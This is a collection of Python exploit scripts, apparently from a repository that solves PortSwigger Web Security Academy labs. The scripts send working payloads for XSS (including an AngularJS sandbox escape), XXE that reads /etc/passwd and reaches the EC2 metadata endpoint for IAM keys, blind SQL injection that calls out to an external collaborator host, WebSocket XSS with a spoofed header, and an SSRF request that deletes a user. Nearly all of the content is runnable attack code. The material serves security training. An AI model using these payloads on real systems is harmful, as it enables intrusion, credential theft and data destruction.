34 | 	time.sleep(2)
35 | 	res = r.text
36 | 	print(res)
37 | 	return r
38 | 
39 | 
40 | 
41 | ##########################################################
42 | #	MAIN
43 | ##########################################################
44 | 
45 | def main():
46 | 	print('[+] Lab: Exploiting XXE to perform SSRF attacks')
47 | 	parser = argparse.ArgumentParser(description="[+] Lab: Exploiting XXE to perform SSRF attacks")
48 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
49 | 	args = parser.parse_args()
50 | 	parsed_url = urllib.parse.urlparse(args.url)
51 | 	host = parsed_url.netloc
52 | 	print(parsed_url)
53 | 	url = parsed_url.scheme + '://' + host
54 | 	s = requests.Session()
55 | 	s.proxies = proxies		# Comment this line to disable proxying
56 | 	s.verify = False
57 | 	try:
58 | 		r = s.get(url, allow_redirects=False)
59 | 		time.sleep(1)
60 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
61 | 			print('\n[-] HOST seems to be down <!>')
62 | 			sys.exit(-1)
63 | 		else:
64 | 			print("[+] Trying send a XXE attack to retrieve the server's IAM secret access key from the EC2 metadata endpoint...")
65 | 			r = send_xxe(s, url)
66 | 			s.cookies.clear()
67 | 			s.headers.clear()
68 | 			time.sleep(5)
69 | 			r = s.get(url, allow_redirects=False)
70 | 			time.sleep(1)
71 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
72 | 				print('[+] The lab is solved !')
73 | 			elif r.status_code == 200:
74 | 				print('[+] The Exploit sent the given payload !')
75 | 	except requests.exceptions.ProxyError:
76 | 		print('\n[-] PROXY seems to be missconfigured <!>')
77 | 
78 | if __name__ == "__main__":
79 | 	main()
80 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab28.py:
--------------------------------------------------------------------------------
 1 | # Reflected XSS in a JavaScript URL with some characters blocked
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-url-some-characters-blocked
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def send_payload(s, url, payload):
27 | 	injection_uri = url + payload
28 | 	r = s.get(injection_uri)
29 | 	time.sleep(1)
30 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
31 | 	print('[+] Using payload:\t%s' % payload)
32 | 	return r
33 | 
34 | def send_xss(s, url):
35 | 	search_path = url + '/post?postId='
36 | 	xss_payload = """1&'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:'"""
37 | 	r = send_payload(s, search_path, xss_payload)
38 | 	return r
39 | 
40 | 
41 | ##########################################################
42 | #	MAIN
43 | ##########################################################
44 | 
45 | def main():
46 | 	print('[+] Lab: Reflected XSS in a JavaScript URL with some characters blocked')
47 | 	parser = argparse.ArgumentParser(description="[+] Lab: Reflected XSS in a JavaScript URL with some characters blocked")
48 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
49 | 	args = parser.parse_args()
50 | 	parsed_url = urllib.parse.urlparse(args.url)
51 | 	host = parsed_url.netloc
52 | 	print(parsed_url)
53 | 	url = parsed_url.scheme + '://' + host
54 | 	s = requests.Session()
55 | 	s.proxies = proxies		# Comment this line to disable proxying
56 | 	s.verify = False
57 | 	try:
58 | 		r = s.get(url, allow_redirects=False)
59 | 		time.sleep(1)
60 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
61 | 			print('\n[-] HOST seems to be down <!>')
62 | 			sys.exit(-1)
63 | 		else:
64 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
65 | 			r = send_xss(s, url)
66 | 			time.sleep(6)
67 | 			r = s.get(url)
68 | 			if r.status_code == 200 :
69 | 				s.cookies.clear()
70 | 				s.headers.clear()
71 | 				time.sleep(3)
72 | 				r = s.get(url)
73 | 				if  'Congratulations, you solved the lab!' in r.text:
74 | 					print('[+] The lab is solved')
75 | 				else:
76 | 					print('[+] The Exploit sent the given payload !')
77 | 	except requests.exceptions.ProxyError:
78 | 		print('[-] PROXY seems to be missconfigured <!>')
79 | 	except KeyboardInterrupt:
80 | 		sys.exit(0)
81 | 
82 | if __name__ == "__main__":
83 | 	main()
84 | 


--------------------------------------------------------------------------------
/SQLInjection/exploit-lab16.py:
--------------------------------------------------------------------------------
 1 | # Blind SQL injection with out-of-band interaction
 2 | 
 3 | # https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_payload(s, url, tracking_cookie, session_cookie, payload):
26 | 	cookies = {"TrackingId": tracking_cookie + payload, "session": session_cookie}
27 | 	r = s.get(url, cookies=cookies)
28 | 	time.sleep(.3)
29 | 	print('[+] Using payload:\t%s' % payload)
30 | 	return r
31 | 
32 | def dnslookup(s, url, tracking_cookie, session_cookie, collab):
33 | 	payload = """' || (SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://""" + collab + """/"> %remote;]>'),'/l') FROM dual)--;"""
34 | 	r = send_payload(s, url, tracking_cookie, session_cookie, urllib.parse.quote(payload))
35 | 	print(r)
36 | 
37 | 
38 | ##########################################################
39 | #	MAIN
40 | ##########################################################
41 | 
42 | def main():
43 | 	print('[+] Lab: Blind SQL injection with out-of-band interaction')
44 | 	parser = argparse.ArgumentParser(description="[+] Lab: Blind SQL injection with out-of-band interaction")
45 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
46 | 	args = parser.parse_args()
47 | 	parsed_url = urllib.parse.urlparse(args.url)
48 | 	host = parsed_url.netloc
49 | 	print(parsed_url)
50 | 	url = parsed_url.scheme + '://' + host
51 | 	s = requests.Session()
52 | 	s.proxies = proxies		# Comment this line to disable proxying
53 | 	s.verify = False
54 | 	try:
55 | 		r = s.get(url, allow_redirects=False)
56 | 		time.sleep(1)
57 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
58 | 			print('\n[-] HOST seems to be down <!>')
59 | 			sys.exit(-1)
60 | 		else:
61 | 			collab = "xxxxxxxxxxxxxxxxxxxx.oastify.com"
62 | 			tracking_cookie = s.cookies.get_dict().get('TrackingId')
63 | 			session_cookie = s.cookies.get_dict().get('session')
64 | 			dnslookup(s, url, tracking_cookie, session_cookie, collab)
65 | 			time.sleep(5)
66 | 			s.cookies.clear()
67 | 			s.headers.clear()
68 | 			r = s.get(url)
69 | 			if 'Congratulations, you solved the lab!' in r.text:
70 | 				print('[+] The lab is solved !')
71 | 	except requests.exceptions.ProxyError:
72 | 		print('[-] PROXY seems to be missconfigured <!>')
73 | 	except KeyboardInterrupt:
74 | 		sys.exit(0)
75 | 
76 | if __name__ == "__main__":
77 | 	main()
78 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab18.py:
--------------------------------------------------------------------------------
 1 | # Reflected XSS into a JavaScript string with single quote and backslash escaped
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-string-single-quote-backslash-escaped
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def send_payload(s, url, payload):
27 | 	injection_uri = url + payload
28 | 	r = s.get(injection_uri)
29 | 	time.sleep(1)
30 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
31 | 	print('[+] Using payload:\t%s' % payload)
32 | 	return r
33 | 
34 | def send_xss(s, url):
35 | 	search_path = url + '/?search='
36 | 	xss_payload = """</script><script>alert(1)</script>"""
37 | 	r = send_payload(s, search_path, urllib.parse.quote(xss_payload))
38 | 	return r
39 | 
40 | 
41 | ##########################################################
42 | #	MAIN
43 | ##########################################################
44 | 
45 | def main():
46 | 	print('[+] Lab: Reflected XSS into a JavaScript string with single quote and backslash escaped')
47 | 	parser = argparse.ArgumentParser(description="[+] Lab: Reflected XSS into a JavaScript string with single quote and backslash escaped")
48 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
49 | 	args = parser.parse_args()
50 | 	parsed_url = urllib.parse.urlparse(args.url)
51 | 	host = parsed_url.netloc
52 | 	print(parsed_url)
53 | 	url = parsed_url.scheme + '://' + host
54 | 	s = requests.Session()
55 | 	s.proxies = proxies		# Comment this line to disable proxying
56 | 	s.verify = False
57 | 	try:
58 | 		r = s.get(url, allow_redirects=False)
59 | 		time.sleep(1)
60 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
61 | 			print('\n[-] HOST seems to be down <!>')
62 | 			sys.exit(-1)
63 | 		else:
64 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
65 | 			r = send_xss(s, url)
66 | 			time.sleep(1)
67 | 			if r.status_code == 200 :
68 | 				s.cookies.clear()
69 | 				s.headers.clear()
70 | 				time.sleep(3)
71 | 				r = s.get(url)
72 | 				if  'Congratulations, you solved the lab!' in r.text:
73 | 					print('[+] The lab is solved')
74 | 				else:
75 | 					print('[+] The Exploit sent the given payload !')
76 | 	except requests.exceptions.ProxyError:
77 | 		print('[-] PROXY seems to be missconfigured <!>')
78 | 	except KeyboardInterrupt:
79 | 		sys.exit(0)
80 | 
81 | if __name__ == "__main__":
82 | 	main()
83 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab27.py:
--------------------------------------------------------------------------------
 1 | # Reflected XSS with event handlers and href attributes blocked
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/contexts/lab-event-handlers-and-href-attributes-blocked
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def send_payload(s, url, payload):
27 | 	injection_uri = url + payload
28 | 	r = s.get(injection_uri)
29 | 	time.sleep(1)
30 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
31 | 	print('[+] Using payload:\t%s' % payload)
32 | 	return r
33 | 
34 | def send_xss(s, url):
35 | 	search_path = url + '/?search='
36 | 	xss_payload = """<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a>"""
37 | 	r = send_payload(s, search_path, urllib.parse.quote(xss_payload))
38 | 	return r
39 | 
40 | 
41 | ##########################################################
42 | #	MAIN
43 | ##########################################################
44 | 
45 | def main():
46 | 	print('[+] Lab: Reflected XSS with event handlers and href attributes blocked')
47 | 	parser = argparse.ArgumentParser(description="[+] Lab: Reflected XSS with event handlers and href attributes blocked")
48 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
49 | 	args = parser.parse_args()
50 | 	parsed_url = urllib.parse.urlparse(args.url)
51 | 	host = parsed_url.netloc
52 | 	print(parsed_url)
53 | 	url = parsed_url.scheme + '://' + host
54 | 	s = requests.Session()
55 | 	s.proxies = proxies		# Comment this line to disable proxying
56 | 	s.verify = False
57 | 	try:
58 | 		r = s.get(url, allow_redirects=False)
59 | 		time.sleep(1)
60 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
61 | 			print('\n[-] HOST seems to be down <!>')
62 | 			sys.exit(-1)
63 | 		else:
64 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
65 | 			r = send_xss(s, url)
66 | 			time.sleep(1)
67 | 			if r.status_code == 200 :
68 | 				s.cookies.clear()
69 | 				s.headers.clear()
70 | 				time.sleep(3)
71 | 				r = s.get(url)
72 | 				if  'Congratulations, you solved the lab!' in r.text:
73 | 					print('[+] The lab is solved')
74 | 				else:
75 | 					print('[+] The Exploit sent the given payload !')
76 | 	except requests.exceptions.ProxyError:
77 | 		print('[-] PROXY seems to be missconfigured <!>')
78 | 	except KeyboardInterrupt:
79 | 		sys.exit(0)
80 | 
81 | if __name__ == "__main__":
82 | 	main()
83 | 


--------------------------------------------------------------------------------
/Websockets/exploit-lab03.py:
--------------------------------------------------------------------------------
 1 | # Manipulating the WebSocket handshake to exploit vulnerabilities
 2 | 
 3 | # https://portswigger.net/web-security/websockets/lab-manipulating-handshake-to-exploit-vulnerabilities
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import websocket
13 | import ssl
14 | import argparse
15 | 
16 | 
17 | warnings.filterwarnings("ignore", category=DeprecationWarning)
18 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
19 | 
20 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
21 | 
22 | 
23 | ##########################################################
24 | #	FUNCTIONS
25 | ##########################################################
26 | 
27 | def send_xss(host):
28 | 	ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE, "check_hostname": False})
29 | 	websock = 'wss://' + host
30 | 	chat_path = websock + '/chat'
31 | 	ws.connect(chat_path, http_proxy_host="127.0.0.1", http_proxy_port="8080", proxy_type="http", header=["X-Forwarded-For: 1.1.1.1"])
32 | 	print('\n[+] Connecting to the chat sending "READY"...')
33 | 	ws.send("READY")
34 | 	resp = ws.recv()
35 | 	print('Response:\n\t%s' % resp)
36 | 	xss_payload = "<img src=x oNeRrOr=alert`1`>"
37 | 	xss_msg = f'{{"message": "{xss_payload}"}}'
38 | 	print('\n[+] Sending:\n\t%s' % xss_msg)
39 | 	ws.send(str(xss_msg))
40 | 	resp = ws.recv()
41 | 	print('Response:\n\t%s' % resp)
42 | 	return resp
43 | 
44 | 
45 | ##########################################################
46 | #	MAIN
47 | ##########################################################
48 | 
49 | def main():
50 | 	print('[+] Lab: Manipulating the WebSocket handshake to exploit vulnerabilities')
51 | 	parser = argparse.ArgumentParser(description="[+] Lab: Manipulating the WebSocket handshake to exploit vulnerabilities")
52 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
53 | 	args = parser.parse_args()
54 | 	parsed_url = urllib.parse.urlparse(args.url)
55 | 	host = parsed_url.netloc
56 | 	print(parsed_url)
57 | 	url = parsed_url.scheme + '://' + host
58 | 	s = requests.Session()
59 | 	s.proxies = proxies		# Comment this line to disable proxying
60 | 	s.verify = False
61 | 	try:
62 | 		r = s.get(url, allow_redirects=False)
63 | 		time.sleep(1)
64 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
65 | 			print('\n[-] HOST seems to be down <!>')
66 | 			sys.exit(-1)
67 | 		else:
68 | 			print('[+] Trying to send XSS through Live Chat websockets...\n')
69 | 			time.sleep(1)
70 | 			send_xss(host)
71 | 			s.cookies.clear()
72 | 			time.sleep(2)
73 | 			r = s.get(url)
74 | 			if 'Congratulations, you solved the lab!' in r.text:
75 | 				print('\n[+] The lab is solved !')
76 | 	except requests.exceptions.ProxyError:
77 | 		print('[-] PROXY seems to be missconfigured <!>')
78 | 	except KeyboardInterrupt:
79 | 		sys.exit(0)
80 | 
81 | if __name__ == "__main__":
82 | 	main()
83 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab10.py:
--------------------------------------------------------------------------------
 1 | # DOM XSS in document.write sink using source location.search inside a select element
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink-inside-select-element
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def send_xss(s, url):
27 | 	stock_path = url + '/product'
28 | 	xss_payload = '"></option></select><img src=x onerror=alert(1) />'
29 | 	stock_params = {
30 | 		"productId": "1",
31 | 		"storeId": xss_payload
32 | 	}
33 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % stock_path)
34 | 	print('[+] Using payload in website field:\t%s' % xss_payload)
35 | 	r = s.get(stock_path, params=stock_params)
36 | 	return r
37 | 
38 | 
39 | ##########################################################
40 | #	MAIN
41 | ##########################################################
42 | 
43 | def main():
44 | 	print('[+] Lab: DOM XSS in document.write sink using source location.search inside a select element')
45 | 	parser = argparse.ArgumentParser(description="[+] Lab: DOM XSS in document.write sink using source location.search inside a select element")
46 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
47 | 	args = parser.parse_args()
48 | 	parsed_url = urllib.parse.urlparse(args.url)
49 | 	host = parsed_url.netloc
50 | 	print(parsed_url)
51 | 	url = parsed_url.scheme + '://' + host
52 | 	s = requests.Session()
53 | 	s.proxies = proxies		# Comment this line to disable proxying
54 | 	s.verify = False
55 | 	try:
56 | 		r = s.get(url, allow_redirects=False)
57 | 		time.sleep(1)
58 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
59 | 			print('\n[-] HOST seems to be down <!>')
60 | 			sys.exit(-1)
61 | 		else:
62 | 			print('[+] Trying send a cross-site scripting attack that reflect the alert function...')
63 | 			r = send_xss(s, url)
64 | 			if r.status_code == 200:
65 | 				s.cookies.clear()
66 | 				s.headers.clear()
67 | 				time.sleep(3)
68 | 				r = s.get(url + '/product?productId=1')
69 | 				if  'Congratulations, you solved the lab!' in r.text:
70 | 					print('[+] The lab is solved')
71 | 				else:
72 | 					print('[+] The Exploit sent the given payload !')
73 | 			else:
74 | 				print('[-] The Exploit failed <!>')
75 | 	except requests.exceptions.ProxyError:
76 | 		print('[-] PROXY seems to be missconfigured <!>')
77 | 	except KeyboardInterrupt:
78 | 		sys.exit(0)
79 | 
80 | if __name__ == "__main__":
81 | 	main()
82 | 


--------------------------------------------------------------------------------
/InformationDisclosure/exploit-lab01.py:
--------------------------------------------------------------------------------
 1 | # Information disclosure in error messages
 2 | 
 3 | # https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-error-messages
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def get_version(s, url):
26 | 	print('\n[+] Trying to produce an error passing a non-integer value to productId parameter...')
27 | 	path = url + '/product?productId="gwyo"'
28 | 	print(path)
29 | 	r = s.get(path)
30 | 	time.sleep(1)
31 | 	print(r.text)
32 | 	framework = r.text.encode().split(b'\n\n')[1].decode()
33 | 	print('\n[+] Found Framework version:\t\t%s' % framework)
34 | 	time.sleep(1)
35 | 	version = framework.replace('Apache Struts ', '')
36 | 	return version
37 | 
38 | def submit_version(s, url, version):
39 | 	print('[+] Trying to submit the version to solve the lab...')
40 | 	submit_path = url + '/submitSolution'
41 | 	submit_data = {"answer": version}
42 | 	r = s.post(submit_path, data=submit_data)
43 | 	time.sleep(1)
44 | 	return r
45 | 
46 | 
47 | ##########################################################
48 | #	MAIN
49 | ##########################################################
50 | 
51 | def main():
52 | 	print('[+] Lab: Information disclosure in error messages')
53 | 	parser = argparse.ArgumentParser(description="[+] Lab: Information disclosure in error messages")
54 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
55 | 	args = parser.parse_args()
56 | 	parsed_url = urllib.parse.urlparse(args.url)
57 | 	host = parsed_url.netloc
58 | 	print(parsed_url)
59 | 	url = parsed_url.scheme + '://' + host
60 | 	s = requests.Session()
61 | 	s.proxies = proxies		# Comment this line to disable proxying
62 | 	s.verify = False
63 | 	try:
64 | 		r = s.get(url, allow_redirects=False)
65 | 		time.sleep(1)
66 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
67 | 			print('\n[-] HOST seems to be down <!>')
68 | 			sys.exit(-1)
69 | 		else:
70 | 			print('[+] Trying to retrieve the number version of the framework...\n')
71 | 			time.sleep(1)
72 | 			version = get_version(s, url)
73 | 			r = submit_version(s, url, version)
74 | 			s.cookies.clear()
75 | 			time.sleep(2)
76 | 			r = s.get(url)
77 | 			if 'Congratulations, you solved the lab!' in r.text:
78 | 				print('\n[+] The lab is solved !')
79 | 	except requests.exceptions.ProxyError:
80 | 		print('[-] PROXY seems to be missconfigured <!>')
81 | 	except KeyboardInterrupt:
82 | 		sys.exit(0)
83 | 
84 | if __name__ == "__main__":
85 | 	main()
86 | 


--------------------------------------------------------------------------------
/SSRF/exploit-lab05.py:
--------------------------------------------------------------------------------
 1 | # SSRF with filter bypass via open redirection vulnerability
 2 | 
 3 | # https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | check_stock_path = '/product/stock'
21 | 
22 | 
23 | ##########################################################
24 | #	FUNCTIONS
25 | ##########################################################
26 | 
27 | def delete_user(s, url):
28 | 	delete_user_url_ssrf_payload = "/product/nextProduct?currentProductId=3&path=http://192.168.0.12:8080/admin/delete?username=carlos"
29 | 	params = {'stockApi': delete_user_url_ssrf_payload}
30 | 	print('[+] Using payload:\t%s' % params)
31 | 	r = s.post(url + check_stock_path, data=params)
32 | 	print("[+] Sending payload...")
33 | 	time.sleep(2)
34 | 	if r.status_code == 200 and 'User deleted successfully' in r.text:
35 | 		print("[+] Successfully deleted CARLOS user !")
36 | 	elif r.status_code == 302:
37 | 		print("[+] The payload has been sent.")
38 | 	else:
39 | 		print("[-] Exploit has FAILED to delete carlos user <!>")
40 | 
41 | 
42 | ##########################################################
43 | #	MAIN
44 | ##########################################################
45 | 
46 | def main():
47 | 	print('[+] Lab: SSRF with filter bypass via open redirection vulnerability')
48 | 	parser = argparse.ArgumentParser(description="[+] Lab: SSRF with filter bypass via open redirection vulnerability")
49 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
50 | 	args = parser.parse_args()
51 | 	parsed_url = urllib.parse.urlparse(args.url)
52 | 	host = parsed_url.netloc
53 | 	print(parsed_url)
54 | 	url = parsed_url.scheme + '://' + host
55 | 	s = requests.Session()
56 | 	s.proxies = proxies		# Comment this line to disable proxying
57 | 	s.verify = False
58 | 	try:
59 | 		r = s.get(url, allow_redirects=False)
60 | 		time.sleep(1)
61 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
62 | 			print('\n[-] HOST seems to be down <!>')
63 | 			sys.exit(-1)
64 | 		else:
65 | 			print("\n[+] Trying to delete Carlos user...")
66 | 			delete_user(s, url)
67 | 			time.sleep(2)
68 | 			r = s.get(url, allow_redirects=False)
69 | 			time.sleep(1)
70 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
71 | 				print('[+] The lab is solved !')
72 | 			elif r.status_code == 200:
73 | 				print('[+] The Exploit sent the given payload !')
74 | 	except requests.exceptions.ProxyError:
75 | 		print('[-] PROXY seems to be missconfigured <!>')
76 | 	except KeyboardInterrupt:
77 | 		sys.exit(0)
78 | 
79 | if __name__ == "__main__":
80 | 	main()
81 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab25.py:
--------------------------------------------------------------------------------
 1 | # Reflected XSS with AngularJS sandbox escape without strings
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/contexts/client-side-template-injection/lab-angular-sandbox-escape-without-strings
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def send_payload(s, url, payload):
27 | 	injection_uri = url + payload
28 | 	r = s.get(injection_uri)
29 | 	time.sleep(1)
30 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
31 | 	print('[+] Using payload:\t%s' % payload)
32 | 	return r
33 | 
34 | def send_xss(s, url):
35 | 	search_path = url + '/?search='
36 | 	xss_payload = '1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(97,61,97,108,101,114,116,40,49,41)=1'
37 | 	r = send_payload(s, search_path, xss_payload)
38 | 	return r
39 | 
40 | 
41 | ##########################################################
42 | #	MAIN
43 | ##########################################################
44 | 
45 | def main():
46 | 	print('[+] Lab: Reflected XSS with AngularJS sandbox escape without strings')
47 | 	parser = argparse.ArgumentParser(description="[+] Lab: Reflected XSS with AngularJS sandbox escape without strings")
48 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
49 | 	args = parser.parse_args()
50 | 	parsed_url = urllib.parse.urlparse(args.url)
51 | 	host = parsed_url.netloc
52 | 	print(parsed_url)
53 | 	url = parsed_url.scheme + '://' + host
54 | 	s = requests.Session()
55 | 	s.proxies = proxies		# Comment this line to disable proxying
56 | 	s.verify = False
57 | 	try:
58 | 		r = s.get(url, allow_redirects=False)
59 | 		time.sleep(1)
60 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
61 | 			print('\n[-] HOST seems to be down <!>')
62 | 			sys.exit(-1)
63 | 		else:
64 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
65 | 			r = send_xss(s, url)
66 | 			time.sleep(1)
67 | 			if r.status_code == 200 :
68 | 				s.cookies.clear()
69 | 				s.headers.clear()
70 | 				time.sleep(3)
71 | 				r = s.get(url)
72 | 				if  'Congratulations, you solved the lab!' in r.text:
73 | 					print('[+] The lab is solved')
74 | 				else:
75 | 					print('[+] The Exploit sent the given payload !')
76 | 	except requests.exceptions.ProxyError:
77 | 		print('[-] PROXY seems to be missconfigured <!>')
78 | 	except KeyboardInterrupt:
79 | 		sys.exit(0)
80 | 
81 | if __name__ == "__main__":
82 | 	main()
83 | 


--------------------------------------------------------------------------------
/EssentialSkills/exploit-lab01.py:
--------------------------------------------------------------------------------
 1 | # Discovering Vulnerabilities Quickly Targeted Scanning
 2 | 
 3 | # https://portswigger.net/web-security/essential-skills/using-burp-scanner-during-manual-testing/lab-discovering-vulnerabilities-quickly-with-targeted-scanning
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_xxe(s, url):
26 | 	check_stock_path = url + '/product/stock'
27 | 	exploit_body = f"""<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>"""
28 | 	exploit_data = {"productId": '1' + exploit_body, "storeId": "3"}
29 | 	print('[+] Using payload:\n%s' % exploit_body)
30 | 	r = s.post(check_stock_path, data=exploit_data)
31 | 	time.sleep(2)
32 | 	res = r.text
33 | 	print('\n[+] Response:\n%s' % res[:(541+620)])
34 | 	return r
35 | 
36 | 
37 | ##########################################################
38 | #	MAIN
39 | ##########################################################
40 | 
41 | def main():
42 | 	print('[+] Lab: Discovering Vulnerabilities Quickly Targeted Scanning')
43 | 	parser = argparse.ArgumentParser(description="[+] Lab: Discovering Vulnerabilities Quickly Targeted Scanning")
